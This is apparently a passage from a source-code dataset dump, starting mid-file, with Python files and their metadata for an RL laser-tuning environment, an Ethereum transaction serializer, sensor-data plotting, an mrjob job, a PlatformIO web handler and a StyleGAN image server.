new_state = kwargs.get('set_state')
print('set_state')
else:
# new_state = self.observation_space.sample()
new_state = np.array([.1,.3,.7,.2])
self.set_state(new_state)
state = self.get_state()
self.state = state
intensity = self.get_intensity()
self.intensity = intensity
# bad_init = False if -(1 - self.intensity / self.target_intensity) > -1 else True
reward = -(1 - self.intensity / self.target_intensity)
self.init_rewards.append(reward)
bad_init = False
done = self.intensity > .95
action = np.zeros(self.action_space.shape)
self.curr_episode += 1
if self.test:
# self.curr_episode += 1
self.rewards.append([])
self.actions.append([])
self.states.append([])
self.dones.append([])
self.add_trajectory_data(state=state, action=action, reward=reward, done=done)
# print('reset',self.dones)
# print('\n init:', -(1 - self.intensity / self.target_intensity))
# return 2 * (state - 0.5)
return state
def add_trajectory_data(self, state, action, reward, done):
self.rewards[self.curr_episode].append(reward)
self.actions[self.curr_episode].append(action)
self.states[self.curr_episode].append(state)
self.dones[self.curr_episode].append(done)
def seed(self, seed=None):
# seed method
np.random.seed(seed)
def render(self, mode='human'):
# render method
print('ERROR\nnot yet implemented!')
pass
def store_trajectories_to_pkl(self, name, directory):
out_put_writer = open(directory + name, 'wb')
pickle.dump(self.states, out_put_writer, -1)
pickle.dump(self.actions, out_put_writer, -1)
pickle.dump(self.rewards, out_put_writer, -1)
pickle.dump(self.dones, out_put_writer, -1)
out_put_writer.close()
if __name__ == '__main__':
import scipy.optimize as opt
tng = SimTangoConnection()
env = FelLocalEnv(tng)
low = env.action_space.low
high = env.action_space.high
def normalize(input, box):
low = tf.convert_to_tensor(box.low, dtype=tf.float64)
high = tf.convert_to_tensor(box.high, dtype=tf.float64)
return tf.math.scalar_mul(tf.convert_to_tensor(2, dtype=tf.float64),
tf.math.add(tf.convert_to_tensor(-0.5, dtype=tf.float64),
tf.multiply(tf.math.add(input, -low), 1 / (high - low))))
def de_normalize(input, box):
low = tf.convert_to_tensor(box.low, dtype=tf.float64)
high = tf.convert_to_tensor(box.high, dtype=tf.float64)
return tf.math.add(
tf.multiply(tf.math.add(tf.math.scalar_mul(tf.convert_to_tensor(1 / 2, dtype=tf.float64), input),
tf.convert_to_tensor(0.5, dtype=tf.float64)),
(high - low)), low)
# print((env.action_space.sample() - low)/(high-low))
# print('')
# for _ in range(1):
# s = env.reset()
# a = env.action_space.sample()
# box = env.action_space
# # ns, r = env.step(a)
# print(a)
# print(normalize(a, box=box))
# print(de_normalize(normalize(a, box=box), box=box))
# # print(env.action_space.low)
# # print('state:', env.descale(s))
# # # print(a)
# # print('new state:', env.descale(ns))
# # print('reward:', r)
# # print('')
class WrappedEnv(gym.Wrapper):
def __init__(self, env, **kwargs):
gym.Wrapper.__init__(self, env)
self.current_action = np.zeros(env.action_space.shape[0])
def reset(self, **kwargs):
self.current_obs = self.env.reset(**kwargs)
return self.current_obs
def step(self, action):
self.env.state = self.current_obs
ob, reward, done, info = self.env.step(action)
return ob, reward, done, info
environment_instance = WrappedEnv(env=env)
rews = []
actions = []
states = []
def objective(action):
actions.append(action.copy())
_, r, _, _ = environment_instance.step(action=action.copy())
rews.append(abs(r))
return abs(r)
if True:
def constr(action):
if any(action > environment_instance.action_space.high[0]):
return -1
elif any(action < environment_instance.action_space.low[0]):
return -1
else:
return 1
init = environment_instance.reset()
print('init: ', init)
start_vector = np.zeros(environment_instance.action_space.shape[0])
# rhobeg = 1 * environment_instance.action_space.high[0]
# print('rhobeg: ', rhobeg)
# res = opt.fmin_cobyla(objective, start_vector, [constr], rhobeg=rhobeg, rhoend=.001)
# constr = {'type': 'ineq', 'fun': lambda x: any(abs(x) > 1/12)}
# minimizer_kwargs = {"method": "COBYLA", "constraints": constr}
# res = opt.basinhopping(objective, start_vector, minimizer_kwargs=minimizer_kwargs)
# print(res)
upper = environment_instance.action_space.high*12
lower = environment_instance.action_space.low*12
soln = pybobyqa.solve(objective, start_vector, maxfun=500, bounds=(lower, upper),
rhobeg=1, seek_global_minimum=True)
print(soln)
fig, axs = plt.subplots(2, sharex=True)
axs[1].plot(rews)
pd.DataFrame(actions).plot(ax=axs[0])
plt.show()
environment_instance.state = init
print(environment_instance.step(soln.x)) | 34.632275 | 112 | 0.567489 | 1,545 | 13,091 | 4.649191 | 0.165049 | 0.03383 | 0.018794 | 0.018934 | 0.243213 | 0.18335 | 0.150494 | 0.106362 | 0.088542 | 0.079354 | 0 | 0.016072 | 0.306088 | 13,091 | 378 | 113 | 34.632275 | 0.774659 | 0.22038 | 0 | 0.226852 | 0 | 0 | 0.016162 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0.00463 | 0.037037 | 0 | 0.240741 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df45e549a1af4f02c178b91f5b88e8159e693bb4 | 220 | py | Python | 06_Array1D/Step06/6_6_sang.py | StudyForCoding/BEAKJOON | 84e1c5e463255e919ccf6b6a782978c205420dbf | [
"MIT"
] | null | null | null | 06_Array1D/Step06/6_6_sang.py | StudyForCoding/BEAKJOON | 84e1c5e463255e919ccf6b6a782978c205420dbf | [
"MIT"
] | 3 | 2020-11-04T05:38:53.000Z | 2021-03-02T02:15:19.000Z | 06_Array1D/Step06/6_6_sang.py | StudyForCoding/BEAKJOON | 84e1c5e463255e919ccf6b6a782978c205420dbf | [
"MIT"
] | null | null | null | t = int(input())
for i in range(t):
count = 0
score = 0
s = input()
for j in s:
if j == 'O':
count += 1
score += count
else:
count = 0
print(score)
| 16.923077 | 26 | 0.390909 | 30 | 220 | 2.866667 | 0.566667 | 0.186047 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035398 | 0.486364 | 220 | 12 | 27 | 18.333333 | 0.725664 | 0 | 0 | 0.166667 | 0 | 0 | 0.004545 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df4783c82e2a310e7871ee16fb7207f64651b42a | 13,710 | py | Python | src/bxcommon/messages/eth/serializers/transaction.py | sasha00123/bxcommon | 4d65c48daacb63bfdf5d121aa4dbf3501cf0516b | [
"MIT"
] | 12 | 2019-11-06T17:39:10.000Z | 2022-03-01T11:26:19.000Z | src/bxcommon/messages/eth/serializers/transaction.py | sasha00123/bxcommon | 4d65c48daacb63bfdf5d121aa4dbf3501cf0516b | [
"MIT"
] | 8 | 2019-11-06T21:31:11.000Z | 2021-06-02T00:46:50.000Z | src/bxcommon/messages/eth/serializers/transaction.py | sasha00123/bxcommon | 4d65c48daacb63bfdf5d121aa4dbf3501cf0516b | [
"MIT"
] | 5 | 2019-11-14T18:08:11.000Z | 2022-02-08T09:36:22.000Z | from typing import Optional, Dict, Any, List
import blxr_rlp as rlp
from bxcommon.messages.eth.serializers.transaction_type import EthTransactionType
from bxcommon.messages.eth.serializers.unsigned_transaction import UnsignedTransaction
from bxcommon.utils import convert
from bxcommon.utils.blockchain_utils.eth import eth_common_utils, eth_common_constants, crypto_utils
from bxcommon.utils.object_hash import Sha256Hash
from bxutils import utils
class AccessedAddress(rlp.Serializable):
fields = [
(
"address",
rlp.sedes.Binary.fixed_length(eth_common_constants.ADDRESS_LEN, allow_empty=True),
),
("storage_keys", rlp.sedes.CountableList(rlp.sedes.binary)),
]
address: bytearray
storage_keys: List[bytearray]
def __init__(self, *args, **kwargs):
self.address = bytearray()
self.storage_keys = []
super().__init__(*args, **kwargs)
@classmethod
def from_json(cls, payload: Dict[str, Any]) -> "AccessedAddress":
return AccessedAddress(
utils.or_else(
utils.optional_map(payload["address"], lambda addr: convert.hex_to_bytes(addr[2:])),
bytes(),
),
[
utils.optional_map(key, lambda k: convert.hex_to_bytes(k[2:]))
for key in payload["storageKeys"]
],
)
class Transaction(rlp.Serializable):
"""
Some notes on the Berlin implementation details:
(see https://eips.ethereum.org/EIPS/eip-2718 for spec)
Transaction can either be an RLP encoded list of all transaction attributes
(e.g. `[nonce, gas_price, start_gas, ..., v, r, s]`), or an opaque byte string
consisting of `"[transaction_type][nonce, gas_price, start_gas, ...]"`.
As a result, `Transaction.serialize/deserialize` can return either the
RLP list or the opaque byte string, and this can be confusing to work with.
As a rule of thumb, LegacyTransactions will need to call `rlp.encode` to
get the transaction byte representation for purposes such as calculating its
hash, while new transaction should not, as that will result in double encoding.
It's possible for LegacyTransaction to be in either representation. In our
implementation, we currently choose to always serialize LegacyTransaction in
the original, first representations, since this is easier on test cases to
ensure we have a mix of old and new transactions in blocks. However, this
code is capable of understanding LegacyTransaction in either format.
"""
transaction_type: EthTransactionType = EthTransactionType.LEGACY
nonce: int = 0
gas_price: int = 0
start_gas: int = 0
to: Optional[bytearray] = None
value: int = 0
data: bytearray
v: int = 0 # pylint: disable=invalid-name
r: int = 0 # pylint: disable=invalid-name
s: int = 0 # pylint: disable=invalid-name
def __init__(self, *args, **kwargs):
self.data = bytearray()
super().__init__(*args, **kwargs)
# pylint: disable=arguments-differ
@classmethod
def serialize(cls, obj, type_parsed: bool = False, **kwargs):
if type_parsed:
result = super().serialize(obj)
if obj.transaction_type == EthTransactionType.LEGACY:
return result
return obj.transaction_type.encode_rlp() + rlp.encode(result)
else:
return obj.__class__.serialize(obj, type_parsed=True, **kwargs)
# pylint: disable=arguments-differ
@classmethod
def deserialize(cls, serial, type_parsed: bool = False, **extra_kwargs):
if type_parsed:
return super().deserialize(serial, **extra_kwargs)
if isinstance(serial, (list, tuple)):
return LegacyTransaction.deserialize(serial, type_parsed=True, **extra_kwargs)
if isinstance(serial, memoryview):
serial = serial.tobytes()
if isinstance(serial, bytes):
transaction_flag = serial[0]
if transaction_flag <= eth_common_constants.MAX_TRANSACTION_TYPE:
transaction_type = EthTransactionType(serial[0])
payload = rlp.decode(serial[1:])
else:
payload = rlp.decode(serial)
transaction_type = EthTransactionType.LEGACY
if transaction_type == EthTransactionType.LEGACY:
return LegacyTransaction.deserialize(payload, type_parsed=True, **extra_kwargs)
elif transaction_type == EthTransactionType.ACCESS_LIST:
return AccessListTransaction.deserialize(payload, type_parsed=True, **extra_kwargs)
raise ValueError(f"Unexpected serial type: {type(serial)}")
def hash(self) -> Sha256Hash:
pass
def contents(self) -> memoryview:
return memoryview(rlp.encode(self))
def is_eip_155_signed(self) -> bool:
return self.v >= eth_common_constants.EIP155_CHAIN_ID_OFFSET
def chain_id(self) -> int:
if self.v % 2 == 0:
v = self.v - 1 # pylint: disable=invalid-name
else:
v = self.v # pylint: disable=invalid-name
return (v - eth_common_constants.EIP155_CHAIN_ID_OFFSET) // 2
def signature(self) -> bytes:
return crypto_utils.encode_signature(self.v, self.r, self.s)
def get_unsigned(self) -> bytes:
pass
def to_json(self) -> Dict[str, Any]:
"""
Serializes data to be close to Ethereum RPC spec for publishing to the transaction
feed.
see https://github.com/ethereum/wiki/wiki/JSON-RPC#eth_gettransactionbyhash
Some fields are excluded, since they will never be populated by bxgateway.
(mainly fields related to the block the transaction gets included in)
- blockHash
- blockNumber
- transactionIndex
"""
message_hash = self.hash()
input_data = convert.bytes_to_hex(self.data)
if not input_data:
input_data = "0x"
else:
input_data = f"0x{input_data}"
serialized_output = {
"from": self.from_address(),
"gas": hex(self.start_gas),
"gas_price": hex(self.gas_price),
"hash": f"0x{str(message_hash)}",
"input": input_data,
"nonce": hex(self.nonce),
"value": hex(self.value),
"v": hex(self.v),
"r": hex(self.r),
"s": hex(self.s),
"type": f"0x{self.transaction_type.value}",
}
to = self.to
if to is not None:
serialized_output["to"] = convert.bytes_to_hex_string_format(to)
return serialized_output
def from_address(self) -> str:
from_key = crypto_utils.recover_public_key(
self.get_unsigned(), self.signature(), eth_common_utils.keccak_hash
)
from_address = crypto_utils.public_key_to_address(from_key)
return convert.bytes_to_hex_string_format(from_address)
@classmethod
def from_json(cls, payload: Dict[str, Any]) -> "Transaction":
transaction_cls = LegacyTransaction
try:
transaction_type = EthTransactionType(int(payload.get("type", "0x0"), 16))
if transaction_type == EthTransactionType.ACCESS_LIST:
transaction_cls = AccessListTransaction
except ValueError:
# assume legacy transaction if transaction_type access fails
pass
return transaction_cls.from_json(payload)
@classmethod
def from_json_with_validation(cls, payload: Dict[str, Any]) -> "Transaction":
"""
create a Transaction from a payload dict.
this method support a less strict payload. and support input in both the Eth format and our own.
"""
if "gas_price" in payload:
payload["gasPrice"] = payload["gas_price"]
if "access_list" in payload:
payload["accessList"] = payload["access_list"]
if "chain_id" in payload:
payload["chainId"] = payload["chain_id"]
for item in ["nonce", "gasPrice", "gas", "value", "v", "r", "s"]:
value = payload[item]
if isinstance(value, int):
payload[item] = hex(value)
for item in ["accessList", "chainId"]:
if item in payload:
value = payload[item]
if isinstance(value, int):
payload[item] = hex(value)
return cls.from_json(payload)
class LegacyTransaction(Transaction):
transaction_type: EthTransactionType = EthTransactionType.LEGACY
fields = [
("nonce", rlp.sedes.big_endian_int),
("gas_price", rlp.sedes.big_endian_int),
("start_gas", rlp.sedes.big_endian_int),
("to", rlp.sedes.Binary.fixed_length(eth_common_constants.ADDRESS_LEN, allow_empty=True)),
("value", rlp.sedes.big_endian_int),
("data", rlp.sedes.binary),
("v", rlp.sedes.big_endian_int),
("r", rlp.sedes.big_endian_int),
("s", rlp.sedes.big_endian_int),
]
def hash(self):
hash_bytes = eth_common_utils.keccak_hash(rlp.encode(self))
return Sha256Hash(hash_bytes)
def get_unsigned(self) -> bytes:
"""
Returns unsigned transaction.
EIP-155 protected transactions require the chain ID encoded in the v
field, and the r/s fields to be empty.
:return:
"""
if self.is_eip_155_signed():
parts = rlp.decode(rlp.encode(Transaction.serialize(self)))
parts_for_signing = parts[:-3] + [
eth_common_utils.int_to_big_endian(self.chain_id()),
b"",
b"",
]
return rlp.encode(parts_for_signing)
else:
return rlp.encode(
UnsignedTransaction(
self.nonce, self.gas_price, self.start_gas, self.to, self.value, self.data
)
)
@classmethod
def from_json(cls, payload: Dict[str, Any]) -> "Transaction":
return LegacyTransaction(
int(payload["nonce"], 16),
int(payload["gasPrice"], 16),
int(payload["gas"], 16),
utils.or_else(
utils.optional_map(payload["to"], lambda to: convert.hex_to_bytes(to[2:])), bytes()
),
int(payload["value"], 16),
convert.hex_to_bytes(payload["input"][2:]),
int(payload["v"], 16),
int(payload["r"], 16),
int(payload["s"], 16),
)
class AccessListTransaction(Transaction):
transaction_type: EthTransactionType = EthTransactionType.ACCESS_LIST
fields = [
("_chain_id", rlp.sedes.big_endian_int),
("nonce", rlp.sedes.big_endian_int),
("gas_price", rlp.sedes.big_endian_int),
("start_gas", rlp.sedes.big_endian_int),
("to", rlp.sedes.Binary.fixed_length(eth_common_constants.ADDRESS_LEN, allow_empty=True)),
("value", rlp.sedes.big_endian_int),
("data", rlp.sedes.binary),
("access_list", rlp.sedes.CountableList(AccessedAddress)),
("v", rlp.sedes.big_endian_int),
("r", rlp.sedes.big_endian_int),
("s", rlp.sedes.big_endian_int),
]
_chain_id: int = 0
access_list: List[AccessedAddress]
def __init__(self, *args, **kwargs):
self.access_list = []
super().__init__(*args, **kwargs)
def hash(self):
hash_bytes = eth_common_utils.keccak_hash(Transaction.serialize(self))
return Sha256Hash(hash_bytes)
def chain_id(self) -> int:
return self._chain_id
def get_unsigned(self) -> bytes:
"""
Returns unsigned transaction. EIP-2930 transaction are always EIP-155
protected. They do not require any of the v/r/s values included.
:return:
"""
parts = rlp.decode(Transaction.serialize(self)[1:])
return EthTransactionType.ACCESS_LIST.encode_rlp() + rlp.encode(parts[:-3])
def signature(self) -> bytes:
return crypto_utils.encode_signature_y_parity(self.v, self.r, self.s)
def to_json(self) -> Dict[str, Any]:
serialized_transaction = super().to_json()
serialized_transaction["chain_id"] = f"0x{self.chain_id()}"
access_list = self.access_list
accessed_addresses = []
for accessed_address in access_list:
accessed_addresses.append(
{
"address": convert.bytes_to_hex_string_format(accessed_address.address),
"storage_keys": [
convert.bytes_to_hex_string_format(key)
for key in accessed_address.storage_keys
],
}
)
serialized_transaction["access_list"] = accessed_addresses
return serialized_transaction
@classmethod
def from_json(cls, payload: Dict[str, Any]) -> "Transaction":
return AccessListTransaction(
int(payload["chainId"], 16),
int(payload["nonce"], 16),
int(payload["gasPrice"], 16),
int(payload["gas"], 16),
utils.or_else(
utils.optional_map(payload["to"], lambda to: convert.hex_to_bytes(to[2:])), bytes()
),
int(payload["value"], 16),
convert.hex_to_bytes(payload["input"][2:]),
[
AccessedAddress.from_json(accessed_address)
for accessed_address in payload["accessList"]
],
int(payload["v"], 16),
int(payload["r"], 16),
int(payload["s"], 16),
)
| 36.462766 | 104 | 0.613713 | 1,587 | 13,710 | 5.110271 | 0.173283 | 0.022688 | 0.020345 | 0.031443 | 0.368927 | 0.290012 | 0.24476 | 0.208385 | 0.199014 | 0.167941 | 0 | 0.010204 | 0.278045 | 13,710 | 375 | 105 | 36.56 | 0.809153 | 0.156018 | 0 | 0.369811 | 0 | 0 | 0.053559 | 0.004603 | 0 | 0 | 0.000266 | 0 | 0 | 1 | 0.09434 | false | 0.011321 | 0.030189 | 0.030189 | 0.309434 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df4845df44a2ce964a86def84f39985731180a50 | 3,425 | py | Python | simulator/lab11_data/gen_event_curve.py | lab11/Task2 | 3c3451599dd303cd1e2469e5b9e36e1b4ca49fa6 | [
"Apache-2.0"
] | 21 | 2018-08-29T18:58:26.000Z | 2022-01-12T09:08:04.000Z | simulator/lab11_data/gen_event_curve.py | lab11/permamote | 3c3451599dd303cd1e2469e5b9e36e1b4ca49fa6 | [
"Apache-2.0"
] | 9 | 2017-11-08T03:22:58.000Z | 2020-05-02T18:23:12.000Z | simulator/lab11_data/gen_event_curve.py | lab11/Task2 | 3c3451599dd303cd1e2469e5b9e36e1b4ca49fa6 | [
"Apache-2.0"
] | 8 | 2018-10-28T23:44:23.000Z | 2021-07-11T05:18:02.000Z | #! /usr/bin/env python3
import os
import numpy as np
import scipy.stats as stats
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
from multiprocessing import Pool
from datetime import datetime
import arrow
data_dir = 'clean_data/'
out_dir = 'curves/'
out_dir = os.path.dirname(out_dir) + '/'
if out_dir:
os.makedirs(out_dir, exist_ok=True)
def decode_to_bool(bytes_to_decode):
if bytes_to_decode == b'True': return True
else: return False
def plot_data(title, times, data):
#monthsloc = mdates.MonthLocator()
#daysloc= mdates.DayLocator()
#monthsfmt = mdates.DateFormatter('%B')
#daysfmt = mdates.DateFormatter('%d')
fig, ax = plt.subplots()
ax.set_title(title)
#ax.xaxis.set_major_locator(monthsloc)
#ax.xaxis.set_major_formatter(monthsfmt)
#ax.xaxis.set_minor_locator(daysloc)
#ax.xaxis.set_minor_formatter(daysfmt)
ax.plot(times, data)
def plot_full_data(fname, utc_diff):
print(fname)
#data = np.loadtxt(data_dir + fname, dtype = 'bool', delimiter=',', usecols=1, converters = {1:decode_to_bool})
#times = np.loadtxt(data_dir + fname, dtype = 'datetime64', delimiter=',', usecols=0, converters = {0:np.datetime64})
array_load = np.load(data_dir + fname)
times = array_load[:,0].astype('datetime64[s]').astype('datetime64[m]')
times = times + np.timedelta64(utc_diff, 'h')
data = array_load[:,1]
# convert to hour granularity
times = times.astype('datetime64[h]').astype(datetime)
unique_times = np.unique(times)
bins = []
for hour in unique_times:
bins.append(np.sum(data[times == hour]))
bins = np.asarray(bins)
plot_data(fname, unique_times, bins)
plt.show()
def generate_average_event_curve(fname, utc_diff, date_range):
print(fname)
#data = np.loadtxt(data_dir + fname, dtype = 'bool', delimiter=',', usecols=1, converters = {1:decode_to_bool})
#times = np.loadtxt(data_dir + fname, dtype = 'datetime64', delimiter=',', usecols=0, converters = {0:np.datetime64})
#times = times + np.timedelta64(utc_diff, 'h')
array_load = np.load(data_dir + fname)
times = array_load[:,0].astype('datetime64[s]').astype('datetime64[m]')
times = times + np.timedelta64(utc_diff, 'h')
data = array_load[:,1]
# convert to hour granularity
times = times.astype('datetime64[h]').astype(datetime)
# limit to range we're interested in
selection = np.logical_and(times >= date_range[0], times < date_range[1])
times = times[selection]
data = data[selection]
# get days of activity
times_days = times.astype('datetime64[D]').astype('datetime64[h]').astype(datetime)
days = np.unique(times_days)
avg_curve = []
for day in days:
times_in_day = times[times_days == day]
unique_times = np.unique(times_in_day)
bins = []
for hour in unique_times:
bins.append(np.sum(data[times == hour]))
bins = np.asarray(bins)
avg_curve.append(bins)
avg_curve = np.asarray(avg_curve)
avg_curve = np.average(avg_curve, axis = 0)
return avg_curve
fname = 'motion-Blink-c098e5900064-3rd_Floor_2016-07-27_clean.npy'
curve = generate_average_event_curve(fname, -4, (datetime(2016, 7, 30), datetime(2016, 8, 6)))
plot_data(fname, np.arange(curve.size), curve/np.max(curve))
np.save(out_dir+fname.split('-')[2] + '_reactive_curve', curve/np.max(curve))
plt.show()
| 36.43617 | 121 | 0.68146 | 486 | 3,425 | 4.62963 | 0.27572 | 0.056889 | 0.032 | 0.028444 | 0.448889 | 0.387111 | 0.387111 | 0.373333 | 0.373333 | 0.373333 | 0 | 0.028329 | 0.175474 | 3,425 | 93 | 122 | 36.827957 | 0.768414 | 0.268029 | 0 | 0.349206 | 0 | 0 | 0.080755 | 0.022499 | 0 | 0 | 0 | 0 | 0 | 1 | 0.063492 | false | 0 | 0.126984 | 0 | 0.206349 | 0.031746 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df48b1fab3b025fdb0b881f82648c4854093fd0e | 1,185 | py | Python | platformio/commands/home/web.py | ysoyipek/platformio-core | 1b2e410f12bd7770d6415264d750e2fd63f697b7 | [
"Apache-2.0"
] | null | null | null | platformio/commands/home/web.py | ysoyipek/platformio-core | 1b2e410f12bd7770d6415264d750e2fd63f697b7 | [
"Apache-2.0"
] | 1 | 2021-06-02T00:23:58.000Z | 2021-06-02T00:23:58.000Z | platformio/commands/home/web.py | ysoyipek/platformio-core | 1b2e410f12bd7770d6415264d750e2fd63f697b7 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from twisted.internet import reactor # pylint: disable=import-error
from twisted.web import static # pylint: disable=import-error
class WebRoot(static.File):
def render_GET(self, request):
if request.args.get("__shutdown__", False):
reactor.stop()
return "Server has been stopped"
request.setHeader("cache-control",
"no-cache, no-store, must-revalidate")
request.setHeader("pragma", "no-cache")
request.setHeader("expires", "0")
return static.File.render_GET(self, request)
| 38.225806 | 74 | 0.704641 | 160 | 1,185 | 5.18125 | 0.63125 | 0.072376 | 0.031363 | 0.038601 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009514 | 0.201688 | 1,185 | 30 | 75 | 39.5 | 0.866808 | 0.540928 | 0 | 0 | 0 | 0 | 0.198864 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.166667 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df49a60668055e5fddda30538086675d22b98c78 | 1,474 | py | Python | task01.py | ryandhjeon/ncdc-analysis | ebeefe329dfe0c5eff73e242a9868ebd29515856 | [
"MIT"
] | null | null | null | task01.py | ryandhjeon/ncdc-analysis | ebeefe329dfe0c5eff73e242a9868ebd29515856 | [
"MIT"
] | null | null | null | task01.py | ryandhjeon/ncdc-analysis | ebeefe329dfe0c5eff73e242a9868ebd29515856 | [
"MIT"
] | null | null | null | from mrjob.job import MRJob
from mrjob.step import MRStep
from datetime import datetime
class MRTask01(MRJob):
def steps(self):
return [
MRStep(mapper=self.mapper1,
reducer=self.reducer1),
MRStep(reducer=self.reducer2)
]
def mapper1(self, _, line):
values = line.split()
try:
id = int(values[0])
year = int(values[2])
if (year >= 1920 and year <= 1940):
yield id, year
except ValueError:
pass
def reducer1(self, key, value):
year = list(value)
year_list = []
for i in year:
year_list.append(i)
year_set_list = list(set(year_list))
date1 = datetime(day=1, month=1, year=1920)
date2 = datetime(day=1, month=1, year=1941)
diff_year = int(date2.strftime("%Y")) - int(date1.strftime("%Y"))
val = (0.8 * diff_year)
if len(year_set_list) >= val:
yield None, key
if len(year_set_list) >= diff_year:
yield key, None
year_count = int(len(year_set_list))
yield None, (year_count, key, year_set_list)
def reducer2(self, _, values):
count = 0
for year_count, key, year_set_list in sorted(values, reverse=True):
count += 1
if count <= 50:
yield (year_count, key), year_set_list
if __name__ == '__main__':
MRTask01.run()
| 25.859649 | 75 | 0.545455 | 185 | 1,474 | 4.162162 | 0.345946 | 0.063636 | 0.1 | 0.054545 | 0.188312 | 0.146753 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 0.34464 | 1,474 | 56 | 76 | 26.321429 | 0.753623 | 0 | 0 | 0 | 0 | 0 | 0.008141 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.093023 | false | 0.023256 | 0.069767 | 0.023256 | 0.209302 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df4a26ff3ff45ae362bf9dfb4da8f35474ae51c2 | 2,595 | py | Python | server.py | ryanbloom/gan-explorer | e3f0412b4e204af2035721a16e33f0bfdc14f3ac | [
"MIT"
] | null | null | null | server.py | ryanbloom/gan-explorer | e3f0412b4e204af2035721a16e33f0bfdc14f3ac | [
"MIT"
] | null | null | null | server.py | ryanbloom/gan-explorer | e3f0412b4e204af2035721a16e33f0bfdc14f3ac | [
"MIT"
] | null | null | null | import os
import sys
import io
import pickle
import torch
import functools
from PIL import Image
from starlette.applications import Starlette
from starlette.responses import Response, FileResponse
from starlette.exceptions import HTTPException
from starlette.staticfiles import StaticFiles
from starlette.routing import Mount, Route
import uvicorn
# Models
dz = 512
sys.path.append("stylegan2-ada-pytorch")
filenames = os.listdir("models")
models = {}
print("Loading models...")
for fname in filenames:
model_name, ext = os.path.splitext(fname)
if ext not in [".pt", ".pkl"]:
continue
with open("models/" + fname, "rb") as f:
G = pickle.load(f)["G_ema"]
G.forward = functools.partial(G.forward, force_fp32=True)
models[model_name] = G
param_count = sum([p.numel() for p in G.parameters()])
print(f"Loaded {model_name} ({param_count} parameters)")
default_model = list(models.keys())[0]
def generate(model_name, latent):
if model_name not in models:
raise HTTPException(400, detail=f"Model \"{model_name}\" not found")
g = models[model_name]
img = g(latent, None)
img = (img.permute(0, 2, 3, 1) * 127.5 + 128).clamp(0, 255).to(torch.uint8)
return img[0].cpu().numpy()
# Decoding latent vectors
enc_digits = 3
max_enc = int(10**enc_digits) - 1
enc_mult = int(10**(enc_digits-1))
def decode_latent(z):
return (torch.Tensor(
[int(z[i:(i+enc_digits)]) for i in range(0, len(z), enc_digits)]
).reshape((1, -1)) / enc_mult) - 2
# Routes
async def home_route(request):
return FileResponse("dist/index.html")
async def generate_route(request):
latent_vector = None
model_name = None
if "model" in request.query_params:
model_name = request.query_params["model"]
else:
model_name = default_model
if "latent" in request.query_params:
try:
latent_vector = decode_latent(request.query_params['latent'])
except ValueError:
pass
if latent_vector is None:
raise HTTPException(400, detail="Invalid latent vector")
else:
latent_vector = torch.randn(1, dz)
output = io.BytesIO()
Image.fromarray(generate(model_name, latent_vector)).save(output, format="PNG")
return Response(output.getvalue(), media_type="image/png")
app = Starlette(routes=[
Route("/", home_route),
Route("/generate", generate_route),
Mount("/", app=StaticFiles(directory="dist"), name="dist")
])
if __name__ == "__main__":
uvicorn.run(app, host="0.0.0.0", port=os.getenv("PORT", 8080))
